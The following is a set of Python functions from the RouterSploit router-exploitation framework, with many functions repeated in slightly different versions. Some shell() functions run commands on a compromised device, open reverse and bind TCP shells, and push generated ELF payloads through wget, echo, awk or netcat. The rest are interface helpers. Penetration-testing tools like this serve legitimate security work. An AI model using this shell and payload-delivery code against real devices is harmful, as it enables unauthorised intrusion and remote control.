def shell(exploit, architecture="", method="", **params): while 1: while not printer_queue.empty(): pass cmd = raw_input("cmd > ") if cmd in ["quit", "exit"]: return c = cmd.split() if len(c) and c[0] == "reverse_tcp": if len(c) == 3: lhost = c[1] lport = c[2] revshell = reverse_shell(exploit, architecture, lhost, lport) if method == "wget": revshell.wget(binary=params['binary'], location=params['location']) elif method == "echo": revshell.echo(binary=params['binary'], location=params['location']) elif method == "awk": revshell.awk(binary=params['binary']) elif method == "netcat": revshell.netcat(binary=params['binary'], shell=params['shell']) else: print_error("Reverse shell is not available") else: print_error("reverse_tcp <reverse ip> <port>") else: print_info(exploit.execute(cmd))
def shell(exploit, architecture="", method="", **params): while 1: cmd = raw_input("cmd > ") if cmd in ["quit", "exit"]: return c = cmd.split() if c[0] == "reverse_tcp": if len(c) == 3: lhost = c[1] lport = c[2] revshell = reverse_shell(exploit, architecture, lhost, lport) if method == "wget": revshell.wget(binary=params['binary'], location=params['location']) elif method == "echo": revshell.echo(binary=params['binary'], location=params['location']) elif method == "awk": revshell.awk(binary=params['binary']) elif method == "netcat": revshell.netcat(binary=params['binary'], shell=params['shell']) else: print_error("Reverse shell is not available") else: print_error("reverse_tcp <reverse ip> <port>") else: print_info(exploit.execute(cmd))
def command_run(self, *args, **kwargs): utils.print_status("Running module...") try: self.current_module.run() except KeyboardInterrupt: utils.print_info() utils.print_error("Operation cancelled by user") except Exception: utils.print_error(traceback.format_exc(sys.exc_info()))
def command_run(self, *args, **kwargs): utils.print_status("Running module...") try: self.current_module.run() except KeyboardInterrupt: utils.print_info() utils.print_error("Operation cancelled by user") except: utils.print_error(traceback.format_exc(sys.exc_info()))
def command_run(self, *args, **kwargs): try: self.current_module.validate_setup() utils.print_status("Running module...") self.current_module.run() except KeyboardInterrupt: utils.print_info() utils.print_error("Operation cancelled by user") except OptionValidationError as err: utils.print_error(err) except Exception: utils.print_error(traceback.format_exc(sys.exc_info()))
def command_search(self, *args, **kwargs): keyword = args[0] if not keyword: utils.print_error( "Please specify search keyword. e.g. 'search cisco'") return for module in self.modules: if keyword in module: module = utils.humanize_path(module) utils.print_info( "{}\033[31m{}\033[0m{}".format(*module.partition(keyword)))
def command_search(self, *args, **kwargs): keyword = args[0] if not keyword: utils.print_error("Please specify search keyword. e.g. 'search cisco'") return for module in self.modules: if keyword in module: module = utils.humanize_path(module) utils.print_info( "{}\033[31m{}\033[0m{}".format(*module.partition(keyword)) )
def shell(exploit, architecture="", method="", **params): while 1: while not printer_queue.empty(): pass cmd = raw_input("cmd > ") if cmd in ["quit", "exit"]: return c = cmd.split() if len(c) and (c[0] == "bind_tcp" or c[0] == "reverse_tcp"): options = {} if c[0] == "bind_tcp": try: options['technique'] = "bind_tcp" options['rhost'] = validators.ipv4(exploit.target) options['rport'] = int(c[1]) options['lhost'] = c[2] options['lport'] = int(c[3]) except: print_error("bind_tcp <rport> <lhost> <lport>") payload = bind_tcp(architecture, options['rport']) elif c[0] == "reverse_tcp": try: options['technique'] = "reverse_tcp" options['lhost'] = c[1] options['lport'] = int(c[2]) except: print_error("reverse_tcp <lhost> <lport>") payload = reverse_tcp(architecture, options['lhost'], options['lport']) communication = Communication(exploit, payload, options) if method == "wget": communication.wget(binary=params['binary'], location=params['location']) elif method == "echo": communication.echo(binary=params['binary'], location=params['location']) elif method == "awk": communication.awk(binary=params['binary']) elif method == "netcat": communication.netcat(binary=params['binary'], shell=params['shell']) else: print_info(exploit.execute(cmd))
def command_show(self, *args, **kwargs): info, options = 'info', 'options' sub_command = args[0] if sub_command == info: utils.pprint_dict_in_order( ("name", "description", "targets", "authors", "references"), self.module_metadata, ) utils.print_info() elif sub_command == options: target_opts = {'port', 'target'} module_opts = set(self.current_module.options) - target_opts headers = ("Name", "Current settings", "Description") utils.print_info('\nTarget options:') utils.print_table(headers, *self.get_opts(*target_opts)) if module_opts: utils.print_info('\nModule options:') utils.print_table(headers, *self.get_opts(*module_opts)) utils.print_info() else: print( "Unknown command 'show {}'. You want to 'show {}' or 'show {}'?" .format(sub_command, info, options))
def _show_devices(self, *args, **kwargs): # TODO: cover with tests try: devices = self.current_module._Exploit__info__['devices'] utils.print_info("\nTarget devices:") i = 0 for device in devices: if isinstance(device, dict): utils.print_info(" {} - {}".format(i, device['name'])) else: utils.print_info(" {} - {}".format(i, device)) i += 1 utils.print_info() except KeyError: utils.print_info("\nTarget devices are not defined")
def command_show(self, *args, **kwargs): info, options = 'info', 'options' sub_command = args[0] if sub_command == info: info = ["name", "description", "targets", "authors", "references"] for i in info: # TODO refactor this. if i in self.module_metadata.keys(): print("\n{}:".format(i.capitalize())) if type(self.module_metadata[i]) is list: for item in self.module_metadata[i]: print("- {}".format(item)) else: print(self.module_metadata[i]) print() elif sub_command == options: target_opts = {'port', 'target'} module_opts = set(self.current_module.options) - target_opts headers = ("Name", "Current settings", "Description") utils.print_info('\nTarget options:') utils.print_table(headers, *self.get_opts(*target_opts)) if module_opts: utils.print_info('\nModule options:') utils.print_table(headers, *self.get_opts(*module_opts)) utils.print_info() else: print("Unknown command 'show {}'. You want to 'show {}' or 'show {}'?".format(sub_command, info, options))
def command_show(self, *args, **kwargs): info, options = 'info', 'options' sub_command = args[0] if sub_command == info: info = ["name", "description", "targets", "authors", "references"] for i in info: # TODO refactor this. if i in self.module_metadata.keys(): print("\n{}:".format(i.capitalize())) if type(self.module_metadata[i]) is list: for item in self.module_metadata[i]: print("- {}".format(item)) else: print(self.module_metadata[i]) print() elif sub_command == options: target_opts = {'port', 'target'} module_opts = set(self.current_module.options) - target_opts headers = ("Name", "Current settings", "Description") utils.print_info('\nTarget options:') utils.print_table(headers, *self.get_opts(*target_opts)) if module_opts: utils.print_info('\nModule options:') utils.print_table(headers, *self.get_opts(*module_opts)) utils.print_info() else: print( "Unknown command 'show {}'. You want to 'show {}' or 'show {}'?" .format(sub_command, info, options))
def run_threads(self, threads, target, *args, **kwargs): workers = [] threads_running = threading.Event() threads_running.set() for worker_id in xrange(int(threads)): worker = threading.Thread( target=target, args=chain((threads_running, ), args), kwargs=kwargs, name='worker-{}'.format(worker_id), ) workers.append(worker) worker.start() start = time.time() try: while worker.isAlive(): worker.join(1) except KeyboardInterrupt: threads_running.clear() for worker in workers: worker.join() print_info('Elapsed time: ', time.time() - start, 'seconds')
def run_threads(self, threads, target, *args, **kwargs): workers = [] threads_running = threading.Event() threads_running.set() for worker_id in xrange(int(threads)): worker = threading.Thread( target=target, args=chain((threads_running,), args), kwargs=kwargs, name='worker-{}'.format(worker_id), ) workers.append(worker) worker.start() start = time.time() try: while worker.isAlive(): worker.join(1) except KeyboardInterrupt: threads_running.clear() for worker in workers: worker.join() print_info('Elapsed time: ', time.time() - start, 'seconds')
def _show_options(self, *args, **kwargs): target_opts = {'port', 'target'} module_opts = set(self.current_module.options) - target_opts headers = ("Name", "Current settings", "Description") utils.print_info('\nTarget options:') utils.print_table(headers, *self.get_opts(*target_opts)) if module_opts: utils.print_info('\nModule options:') utils.print_table(headers, *self.get_opts(*module_opts)) utils.print_info()
def _show_options(self, *args, **kwargs): target_opts = ['target', 'port', 'rhost', 'rport', 'lhost', 'lport'] module_opts = [opt for opt in self.current_module.options if opt not in target_opts] headers = ("Name", "Current settings", "Description") utils.print_info('\nTarget options:') utils.print_table(headers, *self.get_opts(*target_opts)) if module_opts: utils.print_info('\nModule options:') utils.print_table(headers, *self.get_opts(*module_opts)) utils.print_info()
def command_show(self, *args, **kwargs): info, options, devices = 'info', 'options', 'devices' sub_command = args[0] if sub_command == info: utils.pprint_dict_in_order( self.module_metadata, ("name", "description", "devices", "authors", "references"), ) utils.print_info() elif sub_command == options: target_opts = {'port', 'target'} module_opts = set(self.current_module.options) - target_opts headers = ("Name", "Current settings", "Description") utils.print_info('\nTarget options:') utils.print_table(headers, *self.get_opts(*target_opts)) if module_opts: utils.print_info('\nModule options:') utils.print_table(headers, *self.get_opts(*module_opts)) utils.print_info() elif sub_command == devices: if devices in self.current_module._Exploit__info__.keys(): devices = self.current_module._Exploit__info__['devices'] print("\nTarget devices:") i = 0 for device in devices: if isinstance(device, dict): print(" {} - {}".format(i, device['name'])) else: print(" {} - {}".format(i, device)) i += 1 print() else: print("\nTarget devices are not defined") else: print( "Unknown command 'show {}'. You want to 'show {}' or 'show {}'?" .format(sub_command, info, options))
def command_show(self, *args, **kwargs): info, options, devices = 'info', 'options', 'devices' sub_command = args[0] if sub_command == info: utils.pprint_dict_in_order( self.module_metadata, ("name", "description", "devices", "authors", "references"), ) utils.print_info() elif sub_command == options: target_opts = {'port', 'target'} module_opts = set(self.current_module.options) - target_opts headers = ("Name", "Current settings", "Description") utils.print_info('\nTarget options:') utils.print_table(headers, *self.get_opts(*target_opts)) if module_opts: utils.print_info('\nModule options:') utils.print_table(headers, *self.get_opts(*module_opts)) utils.print_info() elif sub_command == devices: if devices in self.current_module._Exploit__info__.keys(): devices = self.current_module._Exploit__info__['devices'] print("\nTarget devices:") i = 0 for device in devices: if isinstance(device, dict): print(" {} - {}".format(i, device['name'])) else: print(" {} - {}".format(i, device)) i += 1 print() else: print("\nTarget devices are not defined") else: print("Unknown command 'show {}'. You want to 'show {}' or 'show {}'?".format(sub_command, info, options))
def _show_options(self, *args, **kwargs): target_opts = ['target', 'port', 'rhost', 'rport', 'lhost', 'lport'] module_opts = [ opt for opt in self.current_module.options if opt not in target_opts ] headers = ("Name", "Current settings", "Description") utils.print_info('\nTarget options:') utils.print_table(headers, *self.get_opts(*target_opts)) if module_opts: utils.print_info('\nModule options:') utils.print_table(headers, *self.get_opts(*module_opts)) utils.print_info()
def command_show(self, *args, **kwargs): info, options = 'info', 'options' sub_command = args[0] if sub_command == info: utils.pprint_dict_in_order( self.module_metadata, ("name", "description", "devices", "authors", "references"), ) utils.print_info() elif sub_command == options: target_opts = {'port', 'target'} module_opts = set(self.current_module.options) - target_opts headers = ("Name", "Current settings", "Description") utils.print_info('\nTarget options:') utils.print_table(headers, *self.get_opts(*target_opts)) if module_opts: utils.print_info('\nModule options:') utils.print_table(headers, *self.get_opts(*module_opts)) utils.print_info() else: print("Unknown command 'show {}'. You want to 'show {}' or 'show {}'?".format(sub_command, info, options))
def start(self): """ Routersploit main entry point. Starting interpreter loop. """ utils.print_info(self.banner) printer_queue.join() while True: try: command, args = self.parse_line(raw_input(self.prompt)) if not command: continue command_handler = self.get_command_handler(command) command_handler(args) except RoutersploitException as err: utils.print_error(err) except EOFError: utils.print_info() utils.print_status("routersploit stopped") break except KeyboardInterrupt: utils.print_info() finally: printer_queue.join()
def command_debug(self, *args, **kwargs): for key, value in self.modules_with_errors.iteritems(): utils.print_info(key) utils.print_error(value, '\n')
def shell(exploit, architecture="", method="", payloads=None, **params): path = "routersploit/modules/payloads/{}/".format(architecture) payload = None options = [] if not payloads: payloads = [ f.split(".")[0] for f in listdir(path) if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py" ] print_info() print_success( "Welcome to cmd. Commands are sent to the target via the execute method." ) print_status( "Depending on the vulnerability, command's results might not be available." ) print_status( "For further exploitation use 'show payloads' and 'set payload <payload>' commands." ) print_info() while 1: while not printer_queue.empty(): pass if payload is None: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > " else: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format( payload._Exploit__info__['name']) cmd = raw_input(cmd_str) if cmd in ["quit", "exit"]: return elif cmd == "show payloads": print_status("Available payloads:") for payload_name in payloads: print_info("- {}".format(payload_name)) elif cmd.startswith("set payload "): c = cmd.split(" ") if c[2] in payloads: payload_path = path.replace("/", ".") + c[2] payload = getattr(importlib.import_module(payload_path), 'Exploit')() options = [] for option in payload.exploit_attributes.keys(): if option not in ["output", "filepath"]: options.append([ option, getattr(payload, option), payload.exploit_attributes[option] ]) if payload.handler == "bind_tcp": options.append([ "rhost", validators.ipv4(exploit.target), "Target IP address" ]) if method == "wget": options.append( ["lhost", "", "Connect-back IP address for wget"]) options.append( ["lport", 4545, "Connect-back Port for wget"]) else: print_error("Payload not available") elif payload is not None: if cmd == "show options": headers = ("Name", "Current settings", "Description") print_info('\nPayload Options:') print_table(headers, *options) print_info() elif cmd.startswith("set "): c = cmd.split(" ") if len(c) != 3: print_error("set <option> <value>") else: for option in options: if option[0] == c[1]: try: setattr(payload, c[1], c[2]) except Exception: print_error("Invalid value for {}".format( c[1])) break option[1] = c[2] print_success("{'" + c[1] + "': '" + c[2] + "'}") elif cmd == "run": data = payload.generate() if method == "wget": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) if communication.wget() is False: continue elif method == "echo": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) communication.echo() elif method == "generic": params['exec_binary'] = data communication = Communication(exploit, "", options, **params) if payload.handler == "bind_tcp": communication.bind_tcp() elif payload.handler == "reverse_tcp": communication.reverse_tcp() elif cmd == "back": payload = None else: print_status("Executing '{}' on the device...".format(cmd)) print_info(exploit.execute(cmd))
def command_help(self, *args, **kwargs): utils.print_info(self.global_help) if self.current_module: utils.print_info("\n", self.module_help)
def __show_modules(self, root=''): for module in [ module for module in self.modules if module.startswith(root) ]: utils.print_info(module.replace('.', os.sep))
def _show_info(self, *args, **kwargs): utils.pprint_dict_in_order( self.module_metadata, ("name", "description", "devices", "authors", "references"), ) utils.print_info()
def shell(exploit, architecture="", method="", payloads=None, **params): path = "routersploit/modules/payloads/{}/".format(architecture) payload = None options = [] if not payloads: payloads = [f.split(".")[0] for f in listdir(path) if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"] print_info() print_success("Welcome to cmd. Commands are sent to the target via the execute method.") print_status("Depending on the vulnerability, command's results might not be available.") print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.") print_info() while 1: while not printer_queue.empty(): pass if payload is None: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > " else: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Exploit__info__['name']) cmd = raw_input(cmd_str) if cmd in ["quit", "exit"]: return elif cmd == "show payloads": print_status("Available payloads:") for payload_name in payloads: print_info("- {}".format(payload_name)) elif cmd.startswith("set payload "): c = cmd.split(" ") if c[2] in payloads: payload_path = path.replace("/", ".") + c[2] payload = getattr(importlib.import_module(payload_path), 'Exploit')() options = [] for option in payload.exploit_attributes.keys(): if option not in ["output", "filepath"]: options.append([option, getattr(payload, option), payload.exploit_attributes[option]]) if payload.handler == "bind_tcp": options.append(["rhost", validators.ipv4(exploit.target), "Target IP address"]) if method == "wget": options.append(["lhost", "", "Connect-back IP address for wget"]) options.append(["lport", 4545, "Connect-back Port for wget"]) else: print_error("Payload not available") elif payload is not None: if cmd == "show options": headers = ("Name", "Current settings", "Description") print_info('\nPayload Options:') print_table(headers, *options) print_info() elif cmd.startswith("set "): c = cmd.split(" ") if len(c) != 3: print_error("set <option> <value>") else: for option in options: if option[0] == c[1]: try: setattr(payload, c[1], c[2]) except Exception: print_error("Invalid value for {}".format(c[1])) break option[1] = c[2] print_success("{'" + c[1] + "': '" + c[2] + "'}") elif cmd == "run": data = payload.generate() if method == "wget": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) if communication.wget() is False: continue elif method == "echo": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) communication.echo() elif method == "generic": params['exec_binary'] = data communication = Communication(exploit, "", options, **params) if payload.handler == "bind_tcp": communication.bind_tcp() elif payload.handler == "reverse_tcp": communication.reverse_tcp() elif cmd == "back": payload = None else: print_status("Executing '{}' on the device...".format(cmd)) print_info(exploit.execute(cmd))
def __show_modules(self, root=''): for module in [module for module in self.modules if module.startswith(root)]: utils.print_info(module.replace('.', os.sep))
def command_search(self, *args, **kwargs): # TODO cover with unit tests for arg in args: matches = [s for s in self.modules if arg in s] for match in matches: utils.print_info(match.replace('.', '/'))